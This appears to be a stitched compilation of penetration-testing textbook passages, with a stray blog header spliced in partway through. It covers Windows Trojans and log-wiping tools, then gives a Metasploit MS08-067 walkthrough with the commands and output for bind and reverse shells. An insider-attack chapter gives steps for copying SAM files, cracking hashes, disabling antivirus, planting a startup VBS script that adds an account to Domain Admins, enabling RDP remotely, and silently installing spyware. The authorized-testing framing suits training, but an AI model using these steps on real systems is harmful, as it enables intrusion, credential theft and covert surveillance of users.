Checking a System with System File Verification

Windows 2003 includes a feature called Windows File Protection (WFP) that prevents the replacement of protected files. WFP checks the file integrity when an attempt is made to overwrite a SYS, DLL, OCX, TTF, or EXE file. This ensures that only Microsoft-verified files are used to replace system files.

Another tool, sigverif, checks to see what files Microsoft has digitally signed on a system., we will use this tool.

System File Checker is another command line–based tool used to check whether a Trojan program has replaced files. If System File Checker detects that a file has been overwritten, it retrieves a known good file from the Windows\system32\dllcache folder and overwrites the unverified file. The command to run the System File Checker is sfc/scannow.

Tini is a small and simple backdoor Trojan for Windows operating systems. It listens on port 7777 and gives a hacker a remote command prompt on the target system. To connect to a Tini server, the hacker telnets to port 7777.

Donald Dick is a backdoor Trojan for Windows OSs that allows a hacker full access to a system over the Internet. The hacker can read, write, delete, or run any program on the system. Donald Dick also includes a keylogger and a Registry parser, and can perform functions such as opening or closing the CD-ROM tray. The attacker uses the client to send commands to the victim listening on a predefined port. Donald Dick uses default port 23476 or 23477.

NetBus is a Windows GUI Trojan program and is similar in functionality to Donald Dick. It adds the Registry key HKEY_CURRENT_USER\NetBus Server and modifies the HKEY_CURRENT_USER\NetBus Server\General\TCPPort key. If NetBus is configured to start automatically, it adds a Registry entry called NetBus Server Pro in HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices.

SubSeven is a Trojan that can be configured to notify a hacker when the infected computer connects to the Internet and can tell the hacker information about the system. This notification can be done over an IRC network, by ICQ, or by email. SubSeven can cause a system to slow down, and generates error messages on the infected system.

Back Orifice 2000 is a remote administration tool that an attacker can use to control a system across a TCP/IP connection using a GUI interface. Back Orifice doesn't appear in the task list or list of processes, and it copies itself into the Registry to run every time the computer is started. The filename that it runs is configurable before it's installed. Back Orifice modifies the HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices Registry key. BackOrifice plug-ins add features to the BackOrifice program. Plug-ins include cryptographically strong Triple DES encryption, a remote desktop with optional mouse and keyboard control, drag-and-drop encrypted file transfers, Explorer-like file system browsing, graphical remote Registry editing, reliable UDP and ICMP communications protocols, and stealth capabilities that are achieved by using ICMP instead of TCP and UDP.

BoSniffer appears to be a fix for Back Orifice but is actually a Back Orifice server with the SpeakEasy plug-in installed. If BoSniffer.exe, the BoSniffer executable, is run on a target system, it attempts to log on to a predetermined IRC server on channel #BO_OWNED with a random username. It then proceeds to announce its IP address and a custom message every few minutes so that the hacker community can use this system as a zombie for future attacks.

ComputerSpy Key Logger is a program that a hacker can use to record computer activities on a computer, such as websites visited; logins and passwords for ICQ, MSN, AOL, AIM, and Yahoo! Messenger or webmail; current applications that are running or executed; Internet chats; and email. The program can even take snapshots of the entire Windows desktop at set intervals.

Beast is a Trojan that runs in the memory allocated for the WinLogon.exe service. Once installed, the program inserts itself into Windows Explorer or Internet Explorer. One of Beast's most distinct features is that it's an all-in-one Trojan, meaning the client, the server, and the server editor are stored in the same application.

CyberSpy is a telnet Trojan that copies itself into the Windows system directory and registers itself in the system Registry so that it starts each time an infected system is rebooted. Once this is done, it sends a notice via email or ICQ and then begins to listen to a previously specified TCP/IP port.

Subroot is a remote administration Trojan that a hacker can use to connect to a victim system on TCP port 1700.

LetMeRule! is a remote access Trojan that can be configured to listen on any port on a target system. It includes a command prompt that an attacker uses to control the target system. It can delete all files in a specific director, execute files at the remote host, or view and modify the Registry.

Firekiller 2000 disables antivirus programs and software firewalls. For instance, if Norton AntiVirus is in auto scan mode in the Taskbar, and AtGuard Firewall is activated, the program stops both on execution and makes the installations of both unusable on the hard drive. They must then be reinstalled to restore their functionality. Firekiller 2000 works with all major protection software, including AtGuard, Norton AntiVirus, and McAfee Antivirus.

The first thing intruders do after gaining administrator privileges is disable auditing. Windows auditing records certain events in a log file that is stored in the Windows Event Viewer. Events can include logging into the system, an application, or an event log. An administrator can choose the level of logging implemented on a system. Hackers want to determine the level of logging implemented to see whether they need to clear events that indicate their presence on the system.

Intruders can easily wipe out the security logs in the Windows Event Viewer. An event log that contains one or just a few events is suspicious because it usually indicates that other events have been cleared. It's still necessary to clear the event log after disabling auditing, because using the Auditpol tool places an entry in the event log indicating that auditing has been disabled. Several tools exist to clear the event log, or a hacker can do so manually in the Windows Event Viewer.

Hacking Tools

The elsave.exe utility is a simple tool for clearing the event log. It's command line based.

WinZapper is a tool that an attacker can use to erase event records selectively from the security log in Windows 2000. WinZapper also ensures that no security events are logged while the program is running.

Evidence Eliminator is a data-cleansing system for Windows PCs. It prevents unwanted data from becoming permanently hidden in the system. It cleans the Recycle Bin, Internet cache, system files, temp folders, and so on. Evidence Eliminator can also be used by a hacker to remove evidence from a system after an attack.

Understanding Steganography Technologies

Steganography is the process of hiding data in other types of data such as images or text files. The most popular method of hiding data in files is to utilize graphic images as hiding places. Attackers can embed any information in a graphic file using steganography. The hacker can hide directions on making a bomb, a secret bank account number, or answers to a test. Any text imaginable can be hidden in an image. In Exercise 4.3 you will use Image Hide to hide text within an image.

Steganography can be detected by some programs, although doing so is difficult. The first step in detection is to locate files with hidden text, which can be done by analyzing patterns in the images and changes to the color palette.

To Catch An APT

Sep 08, 2011 | 09:37 PM | 0 Comments

Using the Metasploit Console to Launch Exploits

Our first Metasploit demo involves exploiting the MS08-067 Windows XP vulnerability that led to the Conficker superworm of late 2008–early 2009. We’ll use Metasploit to get a remote command shell running on the unpatched Windows XP machine. Metasploit can pair any Windows exploit with any Windows payload. So, we can choose the MS08-067 vulnerability to open a command shell, create an administrator, start a remote VNC session, or do a bunch of other stuff discussed later in the chapter. Let’s get started.

$ ./msfconsole
                     888                           888        d8b888
                     888                           888        Y8P888
                     888                           888           888
88888b.d88b.  .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P  Y8b888       "88b88K     888 "88b888d88""88b888888
888  888  88888888888888   .d888888"Y8888b.888  888888888  888888888
888  888  888Y8b.    Y88b. 888  888     X88888 d88P888Y88..88P888Y88b.
888  888  888 "Y8888  "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
                                           888
                                           888
                                           888
        =[ metasploit v3.4.0-dev [core:3.4 api:1.0]
+ -- --=[ 317 exploits - 93 auxiliary
+ -- --=[ 216 payloads - 20 encoders - 6 nops
        =[ svn r9114 updated today (2010.04.20)
msf >

The interesting commands to start with are

show <exploits | payloads>
info <exploit | payload> <name>
use <exploit-name>

You’ll find all the other commands by typing help or ?. To launch an MS08-067 exploit, we’ll first need to find the Metasploit name for this exploit. We can use the search command to do so:

msf > search ms08-067
[*] Searching loaded modules for pattern 'ms08-067'…
Exploits
========
   Name                         Rank   Description
   ----                         ----   -----------
   windows/smb/ms08_067_netapi  great  Microsoft Server Service Relative Path
                                       Stack Corruption


					  

The Metasploit name for this exploit is windows/smb/ms08_067_netapi. We’ll use that exploit and then go looking for all the options needed to make the exploit work:

msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Notice that the prompt changes to enter “exploit mode” when you use an exploit module. Any options or variables you set while configuring this exploit will be retained so that you don’t have to reset the options every time you run it. You can get back to the original launch state at the main console by issuing the back command:

msf exploit(ms08_067_netapi) > back
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) >

Different exploits have different options. Let’s see what options need to be set to make the MS08-067 exploit work:

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


					  

This exploit requires a target address, the port number on which SMB (Server Message Block) listens, and the name of the pipe exposing this functionality:

msf exploit(ms08_067_netapi) > set RHOST 192.168.1.6
RHOST => 192.168.1.6

As you can see, the syntax to set an option is as follows:

set <OPTION-NAME> <option>

Note

Earlier versions of Metasploit were particular about the case of the option name and option, so examples in this chapter always use uppercase if the option is listed in uppercase.

With the exploit module set, we next need to set the payload. The payload is the action that happens after the vulnerability is exploited. It’s like choosing how you want to interact with the compromised machine if the vulnerability is triggered successfully. For this first example, let’s use a payload that simply opens a command shell listening on a TCP port:

msf exploit(ms08_067_netapi) > search "Windows Command Shell"
[*] Searching loaded modules for pattern 'Windows Command Shell'…
Compatible Payloads
===================
   Name                                Rank    Description
   ----                                ----    -----------
   windows/shell/bind_ipv6_tcp         normal  Windows Command Shell, Bind TCP
                                               Stager (IPv6)
   windows/shell/bind_nonx_tcp         normal  Windows Command Shell, Bind TCP
                                               Stager (No NX Support)
   windows/shell/bind_tcp              normal  Windows Command Shell, Bind TCP
                                                Stager
   windows/shell/reverse_ipv6_tcp      normal  Windows Command Shell, Reverse
                                               TCP Stager (IPv6)
   windows/shell/reverse_nonx_tcp      normal  Windows Command Shell, Reverse
                                               TCP Stager (No NX Support)
   windows/shell/reverse_ord_tcp       normal  Windows Command Shell, Reverse
                                               Ordinal TCP Stager
   windows/shell/reverse_tcp           normal  Windows Command Shell, Reverse
                                               TCP Stager
   windows/shell/reverse_tcp_allports  normal  Windows Command Shell, Reverse
                                               All-Port TCP Stager
   windows/shell/reverse_tcp_dns       normal  Windows Command Shell, Reverse
                                               TCP Stager (DNS)
   windows/shell_bind_tcp              normal  Windows Command Shell, Bind TCP
                                               Inline
   windows/shell_reverse_tcp           normal  Windows Command Shell, Reverse TCP
                                               Inline


					  

In typical gratuitous Metasploit style, there are 11 payloads that provide a Windows command shell. Some open a listener on the host, some cause the host to “phone home” to the attacking workstation, some use IPv6, some set up the command shell in one network roundtrip (“inline”), while others utilize multiple roundtrips (“staged”). One even connects back to the attacker tunneled over DNS. This Windows XP target virtual machine does not have a firewall enabled, so we’ll use a simple windows/shell/bind_tcp exploit:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp

If the target were running a firewall, we might instead choose a payload that would cause the compromised workstation to connect back to the attacker (“reverse”):

msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/bind_tcp):


					  

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
EXITFUNC  thread           yes       Exit technique: seh, thread, process
LPORT     4444             yes       The local port
RHOST     192.168.1.6      no        The target address

By default, this exploit will open a listener on tcp port4444, allowing us to connect for the command shell. Let’s attempt the exploit:

msf exploit(ms08_067_netapi) > exploit
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 1 opened (192.168.1.4:49623 -> 192.168.1.6:4444)
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!

It worked! We can verify the connection by issuing the netstat command from the Windows XP machine console, looking for established connections on port 4444:

C:\>netstat -ano | findstr 4444 | findstr ESTABLISHED
  TCP    192.168.1.6:4444       192.168.1.4:49623      ESTABLISHED 964

Referring back to the Metasploit output, the exploit attempt originated from 192.168.1.4:49623, matching the output we see in netstat. Let’s try a different payload. Press CTRL-Z to put this session into the background:

C:\>^Z
Background session 1? [y/N]  y
msf exploit(ms08_067_netapi) >

Now set the payload to windows/shell/reverse_tcp, the reverse shell that we discovered:

msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.1.6      yes        The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell/reverse_tcp):
   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique: seh, thread, process
   LHOST                      yes        The local address
   LPORT     4444             yes       The local port


					  

This payload requires an additional option, LHOST. The victim needs to know to which host to connect when the exploit is successful.

msf exploit(ms08_067_netapi) > set LHOST 192.168.1.4
LHOST => 192.168.1.4
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.1.4:4444
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (240 bytes) to 192.168.1.6
[*] Command shell session 2 opened (192.168.1.4:4444 -> 192.168.1.6:1180)
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>echo w00t!
echo w00t!
w00t!

Notice that this is “session 2.” Press CTRL-Z to put this session in the background and go back to the Metasploit prompt. Then, issue the command sessions –l to list all active sessions:

Background session 2? [y/N]  y
msf exploit(ms08_067_netapi) > sessions -l
Active sessions
===============
  Id  Type   Information                              Connection
  --  ----   -----------                              ----------
  1   shell                                           192.168.1.4:49623 ->
192.168.1.6:4444
  2   shell  Microsoft Windows XP [Version 5.1.2600]  192.168.1.4:4444 ->
192.168.1.6:1180

It’s easy to bounce back and forth between these two sessions. Just use the sessions –i <session>. If you don’t get a prompt immediately, try pressing ENTER.

msf exploit(ms08_067_netapi) > sessions -i 1
[*] Starting interaction with 1…
C:\>^Z
Background session 1? [y/N] y
msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2…
C:\WINDOWS\system32>

You now know the most important Metasploit console commands and understand the basic exploit-launching process. Next, we’ll explore other ways to use Metasploit in the penetration testing process.

Conducting an Insider Attack

Conducting an attack from the inside can be accomplished by using familiar tools and techniques, all of which are found in this book. The primary difference is that you will be working inside the target company at a pre-specified privilege level of an employee, complete with your own network account. In most cases, you can arrange for a private place to work from, at least initially, but in some cases you may have to work out in the open in the presence of other employees. Both scenarios have their advantages; for example, whereas working in private allows you to work undisturbed, working with other employees allows you to get up to speed on security procedures more quickly.

No matter where you wind up working, it’s a given that you must be able to explain your presence, as any newcomer is likely be questioned by curious coworkers. These encounters are far less stressful than encounters during social engineering or physical intrusions because you are legitimately working for someone at the target company and have an easy cover story. In most cases, a simple “consulting” explanation will suffice. In all cases, the fewer people at the target company that are aware of your activities, the more realistic the test will be. If the help desk staff or system administrators are aware that you are a gray hat posing as an employee with the intent of subverting security controls, they will be tempted to keep a close eye on what you’re doing or, in some cases, even give you specially prepared equipment to work from.

For this chapter, we’ll examine a hypothetical company call ComHugeCo Ltd. We’ve been given a Windows domain user account called MBryce with minimal privileges. We’ll attempt to gain domain administrator rights in order to search and access sensitive information.

Tools and Preparation

Each test will be slightly different depending on the environment you are working within. It’s best to work from equipment supplied by the target organization and begin with very little knowledge of the security controls in place. You should arrive prepared with everything you need to conduct your attack since you may not have an opportunity to download anything from the outside once you’re in. At the time of this writing, most companies use content filters. A good network security monitoring (NSM) system or intrusion detection system (IDS) operator will also notice binary downloads coming from hacking sites or even unfamiliar IP addresses. Have all the tools you are likely to need with you on removable media such as a USB drive or CD.

Since you may find the equipment provided fully or partially locked down, hardened, or centrally controlled, you should also have bootable media available to help you access both the individual system and the network at a higher privilege level than afforded your provided account. In the most difficult cases, such as a fully locked CMOS and full disk encryption, you may even want to bring a hard drive with a prepared operating system on it so that you can attempt to gain access to the subject network from the provided equipment. Having your tools with you will help you stay under the radar. We’ll discuss a few practical examples in the following sections.

Orientation

The most common configuration you’ll encounter is the Windows workstation, a stand-alone PC or laptop computer running a version of Microsoft Windows. It will most likely be connected to a wired LAN and utilize the Windows domain login. You’ll be given a domain account. Log in and have a look around. Take some time to “browse” the network using the Windows file explorer. You may see several Windows domains as well as drives mapped to file servers, some of which you may already be connected to. The whole point of the insider attack is to find sensitive information, so keep your eyes open for servers with descriptive names such as “HR” or “Engineering.” Once you feel comfortable that you know the bounds of your account and have a general view of the network, it’s time to start elevating your privilege level.

Gaining Local Administrator Privileges

The local operating system will have several built-in accounts, at least one of which will be highly privileged. By default, the most privileged account will be the Administrator account, but it’s not uncommon for the account to be renamed in an attempt to obscure it from attackers. Regardless of what the privileged account names are, they will almost always be in the Administrators group. An easy way to see what users are members of the local Administrators group of an individual machine is to use the built-in net command from the command prompt:

net localgroup Administrators

In addition to the Administrator account, there will often be other privileged accounts owned by the help desk and system administration groups within the company. For the purposes of our example, our machine uses the Windows default Administrator account.

The easiest way to gain access to the Administrator account is to reset its password. In order to do this while the operating system is running, you’d need to know the existing password, which you probably won’t. Windows protects the file that contains the password hashes, the SAM file, from being accessed while the OS is running. While there are exploits that allow access to the file’s contents while Windows is running, doing so may set off an alert if a centrally managed enterprise antivirus system is in place. Dumping the SAM file only gives you the password hashes, which you then will have to crack. While recovering the local Administrator password is on our agenda, we’ll remove the password from the Administrator account altogether. We’ll collect the SAM file and hashes along the way for cracking later. To do this, we’ll boot the system from a CD or USB drive and use the Offline NT Password and Registry Editor tool (referred to hereafter as “Offline NT Password” for short).

Most computers boot from removable media such as a CD-ROM or floppy disk when they detect the presence of either. If nothing is detected, the machine then boots from the first hard drive. Some machines are configured to bypass removable media devices but still provide a boot menu option during power-up. This menu allows the user to select which device to boot from. Our example uses the Phoenix BIOS, which allows the user to select a boot device by hitting the ESC key early in the boot process. In the worst case, or the best configurations, the boot menu will be password protected. If that’s the case, you’ll have to try dumping the SAM file with an exploit such as pwdump7 while the machine is running. Alternatively, you can install a hard drive of your own as primary to boot from and then access the target Windows drive as a secondary to recover the SAM file.

Offline NT Password is a stripped-down version of Linux with a menu-driven interface. By default, it steps you through the process of removing the Administrator account password. While we have the Windows file system accessible, we’ll also grab the SAM file before we remove the Administrator password. If you choose to boot Offline NT Password from a CD, make sure that you first insert a USB thumb drive to copy the SAM file to. This will make mounting it much easier.

Using Offline NT Password and Registry Editor

Offline NT Password runs in command-line mode. Once booted, it displays a menu-driven interface. In most cases, the default options will step you through mounting the primary drive and removing the Administrator account password, as described next.

Step One The tool presents a list of drives and makes a guess as to which one contains the Windows operating system. As you can see from Figure 6-1, it also detects inserted USB drives. This makes mounting them much easier, because if you insert one later, the tool often will not create the block device (/dev/sdb1) necessary to mount it.

In this case, the boot device containing Windows is correctly identified by default, so simply press ENTER to proceed.

Step Two Next, the tool tries to guess the location of the SAM file. In Figure 6-2, we can see that it is correctly identified as located in WINDOWS/system32/config.

Figure 6-2. Finding the SAM file

[View full size image]

Again, the correct action is preselected from the menu by default. Before continuing, however, we want to copy the SAM file to the USB drive. Since Offline NT Password is built on a simple Linux system, we can invoke another pseudo-terminal by pressing ALT-F2. This opens another shell with a command prompt. Mount the USB drive using the device name identified in step one and shown in Figure 6-1:

mount /dev/sdb1 /mnt

Next, copy the SAM and SECURITY files to the USB drive. Offline NT Password mounts the boot disk in the directory /disk.

cp /drive/WINDOWS/system32/config/SAM /mnt
cp /drive/WINDOW/system32/config/SECURITY /mnt

Make sure you perform a directory listing of your USB drive to confirm you’ve copied the files correctly, as shown here:

Now return to the menu on pseudo-terminal one by pressing ALT-F1, and then press ENTER to accept the default location of the SAM file.

Step Three The tool will now look into the SAM file and list the accounts. It will then give you the option to remove or replace the selected account password. By default, the Administrator account will be selected, as shown here:

Once selected, the default option is to simply remove the password, as shown next. Although there is an option to reset the password to one of your own choosing, this is not recommended because you risk corrupting the SAM file. Press ENTER to accept the default.

Step Four Once the password is successfully removed from the SAM file, it must be written back to the file system. As shown here, the default option will do this and report success or failure, so press ENTER:

With the SAM file successfully written back to the file system, simply press ENTER for the default option to not try again, and the menu will exit. Remove the CD and reboot the system. You will now be able to log in as the local Administrator with no password.

Recovering the Administrator Password

Despite widely publicized best practices, in more cases than not the LAN Manager (LM) hash for the Administrator account will still be present on the local machine. This hash can easily be cracked to reveal the local Administrator account password. This password will almost never be unique to just one machine and will work on a group of computers on the target network. This will allow virtually full control of any peer computer on the network that shares the password.

Since you’re on the client’s site and using their equipment, your choices may be more limited than your lab, but options include:

• Bringing rainbow tables and software with you on a large USB hard drive

• Using a dictionary attack with Cain or L0phtCrack

• Taking the SAM file back to your office to crack overnight

• Sending the SAM file to a member of your team on the outside

If you are working as a team and have someone available offsite, you may want to send the hashes to your team across the Internet via e-mail or web-based file sharing. This does present a risk, however, as it may be noticed by vigilant security personnel or reported by advanced detective controls. If you do decide to send the hashes, you should strongly encrypt the files, not only to obscure the contents but also to protect the hashes from interception or inadvertent disclosure. In our example, we’ll use Cain and rainbow tables from a USB hard drive running on the provided equipment now that we can log in as the local Administrator with no password.

Disabling Antivirus

Cain, like many gray hat tools, is likely to be noticed by almost any antivirus (AV) product installed on the system you’re using. If Cain is detected, it may be reported to the manager of the AV product at the company. Disabling AV software can be accomplished in any number of ways depending on the product and how it’s configured. The most common options include:

• Uninstall it (may require booting into Safe Mode)

• Rename the files or directories from an alternative OS (Linux)

• Suspend the process or processes with Sysinternals Process Explorer

An AV product is typically included in the standard disk image used during the workstation provisioning process. Finding the AV product on the computer is usually a simple process, as it likely has a user-level component such as a tray icon or an entry in the Programs menu off the Start button. In their simplest forms, AV products may simply be removed via the Add or Remove Programs feature located in the Control Panel. Bear in mind that after you remove the AV product, you are responsible for the computer’s safety and behavior on the network, as AV is a first-line protective control. The risk is minimal because typically you’re not going to use the computer to access websites, read e-mail, instant message, or perform other high-risk activities.

If you are having difficulty uninstalling the AV product, try booting into Safe Mode. This will limit which applications are loaded to a minimum, which in many cases will negate the active protective controls built into AV products allowing you to uninstall them.

If the product still will not uninstall even while in Safe Mode, you may have to boot the computer with an alternative OS that can mount an NTFS file system in read/write mode, such as Ubuntu or Knoppix. Once the NTFS is mounted under Linux, you can then rename the files or directory structure to prevent AV from loading during the boot process.

As an alternative, you may suspend the AV processes while you work. This may be necessary if the AV product is difficult to uninstall from the local machine without permission from the centralized application controller located somewhere else on the network. In some cases where an enterprise-level product is in use, the AV client will be pushed back onto the workstation and reinstalled if it’s not detected during periodic sweeps. You can use Sysinternals Process Explorer, procexp, to identify and suspend the processes related to the AV product. You may need to play with permissions to achieve this. To suspend a process using procexp, simply right-click the desired process from the displayed list and select Suspend from the drop-down menu, as shown in Figure 6-3. To resume the process, right-click it and select Restart from the drop-down menu.

Figure 6-3. Process Explore

[View full size image]

While the processes are suspended, you will be able to load previously prohibited tools, such as Cain, and perform your work. Keep in mind that you must remove your tools when you are finished, before you restart the AV processes, or their presence may be reported as an incident.

Raising Cain

Now that AV is disabled, you may load Cain. Execute the ca_setup.exe binary from your USB thumb drive or CD and install Cain. The install process will ask if you would like to install WinPcap. This is optional, as we will not be performing password sniffing or man-in-the-middle attacks for our simulated attack. Cain is primarily a password-auditing tool. It has a rich feature set, which could be the subject of an entire chapter, but for our purposes we’re going to use Cain to

• Recover the Administrator password from the SAM file

• Identify key users and computers on the network

• Locate and control computers that use the same local Administrator password

• Add our account to the Domain Administrators group

Recovering the local Administrator Password

With Cain running and the USB drive containing the recovered SAM file from the previous section inserted, click the Cracker tab, and then right-click in the empty workspace and select Add to List. Click the Import Hashes from a SAM Database radio button and select the recovered SAM file from the removable drive, as shown here:

Next you’ll need the boot key. This is used to unlock the SAM file in the event it is encrypted, as is the case in some configurations. Click the selection icon (…) to the right of the Boot Key (HEX) text box, and then click the Local System Boot Key button, as shown here:

Select and copy the displayed key, click Exit, and then paste the key into the Boot Key (HEX) text box. Click the Next button and the account names and hashes will appear in the Cracking window.

In our example, we’re going to recover the password using a cryptanalysis attack on the LM hashes. Using presorted rainbow tables, on a 1TB USB hard drive in this case, and Cain’s interface to the Rainbow Crack application, most passwords can be recovered in under 30 minutes. Right-click in the workspace of the Cracker section of Cain and select Cryptanalysis Attack | LM Hashes | via RainbowTables (RainbowCrack), as shown here:

Next you’ll be prompted to select the rainbow table files to process, in this case from the USB device. After the processing is complete, found passwords will be displayed in the Cracker section next to the account name. The lock icon to the left will change to an icon depicting a ring of keys, as shown here:

Now that we know what the original local Administrator password was, we can change it back on our machine. This will allow us to easily identify other machines on the network that use the same local Administrator password as we continue to investigate the network with Cain.

Identifying Who’s Who

Cain makes it easy to identify available domains, domain controllers, database servers, and even non-Windows resources such as Novell NetWare file servers. Cain also makes it easy to view both workstation and server machine names. Most companies use some sort of consistent naming convention. The naming convention can help you identify resources that likely store or process sensitive information; for example, a server named paychex might be worth looking at closely.

Using Cain’s enumeration feature, it is possible to view user account names and any descriptions that were provided at the time the accounts were created. Enumeration should be performed against domain controllers because these servers are responsible for authentication and contain lists of all users in each domain. Each network may contain multiple domain controllers, and they should each be enumerated. In some cases, the primary domain controller (PDC) may be configured or hardened in such a way that username enumeration may not be possible. In such cases, it is not unusual for a secondary or ternary domain controller to be vulnerable to enumeration.

To enumerate users from a domain controller with Cain, click the Network tab. In the left panel, drill down from Microsoft Windows Network to the domain name you’re interested in, and then to Domain Controllers. Continue to drill down by selecting the name of a domain controller and then Users. When the dialog box appears asking Start Users Enumeration, click Yes and a list of users will appear in the right panel, as shown in Figure 6-4.

Figure 6-4. PDC User Enumeration with Cain

[View full size image]

From this hypothetical list, the BDover account stands out as potentially being highly privileged on the COMHUGECO domain because of its PC Support designation. The DAlduk and HJass accounts stand out as users likely to handle sensitive information. To see what domain groups BDover is a member of, open a command prompt and type

net user BDover /domain

To see which accounts are in the Domain Admins group, type

net group "domain admins" /domain

In our hypothetical network example, BDover is a member of the Domain Admins group. We now want to locate his computer. A simple way to do this is by using the PsLoggedOn tool from the Sysinternals Suite. Execute the command

psloggedon.exe –lx BDover

This will search through every computer in the domain in an attempt to find BDover locally logged on. Depending on the number of computers in the domain, this may take quite a while or simply be impractical. There are commercial help desk solutions available that quickly identify where a user is logged on. In lieu of that, we can check the computer names and comments for hints using Cain.

By clicking the All Computers selection under the COMHUGECO domain in the left panel, a list of computers currently connected to the domain is displayed. In addition to the computer name, the comments are displayed in the rightmost column. As we can see here, a computer described as “Bob’s Laptop” could be BDover’s:

Using PsLoggedOn, we can check to see if BDover is logged into the computer described as “Bob’s Laptop” by issuing the following command:

psloggedon \\comhugec–x31zfp

Next, by clicking the COMHUGEEC-X31ZFP computer in the left pane of Cain, it will attempt to log in using the same account and password as the machine it’s running from. In our case, that’s the local Administrator account and recovered password. The account name that Cain uses to log into the remote computer is displayed to the right of the name. If Cain can’t log in using the local machine’s credentials, it will attempt to log in using anonymous. In our example, the local Administrator password is the same, as shown here:

Leveraging local Administrator Access

So far, we have recovered the shared local Administrator password, identified a privileged user, and found the user’s computer. At this point, we have multiple options. The right option will vary with each environment and configuration. In our situation, it would be advantageous to either add our account to the Domain Admins group or recover the BDover domain password. Either will allow us access to virtually any computer and any file stored on the network and protected by Active Directory.

Joining the Domain Admins Group

Adding a user to the Domain Admins group requires membership in that group. We know that user BDover is a member of that group, so we’ll try to get him to add our MBryce account to the Domain Admins group without his knowledge. By creating a small VBS script, go.vbs in this case, and placing it in the Startup directory on his computer, the next time he logs in, the script will run at his domain permission level, which is sufficient to add our account to the Domain Admins group. The go.vbs script is as follows:

Set objShell = WScript.CreateObject("WScript.Shell")
objShell.Run "net group ""Domain Admins"" MBryce /ADD /DOMAIN",1

To place the script in the Startup directory, simply map the C$ share using the recovered local Administrator password. This can be done from the Cain interface, from Windows Explorer, or from the command prompt with the net use command. In our example, the file should be placed in C:\Documents and Settings\BDover\Start Menu\Programs\Startup. You will have to wait until the next time BDover logs in, which may be the following day. If you are impatient, you can reboot the computer remotely using the Sysinternals PsShutdown tool, but you do so at the risk of arousing the suspicion of the user. Confirm your membership in the Domain Admins group using the net group command and don’t forget to remove the VBS script from the remote computer.

Recovering the User’s Domain Password

The simplest way to recover the user’s password, BDover in this case, is to use commercial activity-logging spyware. SpectorSoft eBlaster is perfect for the job and is not detected by commercial AV products. It can be installed in one of two ways: by using a standard installation procedure or by using a preconfigured silent installation package. The silent installation option costs more, $99 vs. $198, but will be easier to use during an insider attack exercise. Bring the binary with you because downloading it over the client’s LAN may get you noticed. To install the silent binary, place it in the Startup directory as described in the previous section or use PsExec from Sysinternals. If you must use the normal installation procedure, you’ll have to wait until the user is away from their computer and use Microsoft Remote Desktop Protocol (RDP) or DameWare. DameWare is a commercial remote desktop tool that can install itself remotely on the user’s computer and remove itself completely at the end of the session. If the user’s computer is not configured for terminal services, you can attempt to enable the service by running the following command line remotely with Sysinternals PsExec:

psexec \\machinename reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d


					  

SpectorSoft eBlaster reports are delivered via e-mail at regular intervals, typically 30 minutes to one hour, and record all login, website, e-mail, and chat activity. Once installed, eBlaster can be remotely managed or even silently uninstalled through your account on the SpectorSoft website.

It is also possible to collect keystrokes using a physical inline device such as the KeyGhost. The device comes in three styles: inline with the keyboard cable (as shown in Figure 6-5), as a USB device, and as a stand-alone keyboard. Each version collects and stores all keystrokes typed. Keystrokes are retrieved by typing an unlock code with the device plugged into any computer; it will dump all stored data to a log file. Obviously, this is not a good solution for a portable computer, but on a workstation or a server, it’s unlikely to be detected.

Figure 6-5. KeyGhost device placement

[View full size image]

Finding Sensitive Information

Along the way, you may find some users or servers you suspect contain sensitive information. Workstation and server names and descriptions can help point you in the right direction. Now that we have the keys to the kingdom, it’s very easy to access it. A tool that can help you locate further information is Google Desktop. Since we’re now a domain administrator, we can map entire file server drives or browse any specific user directory or workstation we think may contain valuable information. Once mapped, we can put Google Desktop to work to index the files for us. We can then search the indexed data by keywords such SSN, Social Security, Account, Account Number, and so forth. We can also search by file types, such spreadsheets or CAD drawings, or by any industry-specific terminology. Google Desktop can also help pinpoint obscure file storage directories that may not have been noticed any other way during the testing process.

References

Cain www.oxid.it/

DameWare www.dameware.com/

Google Desktop desktop.google.com/

KeyGhost www.keyghost.com/

Knoppix www.knoppix.org/

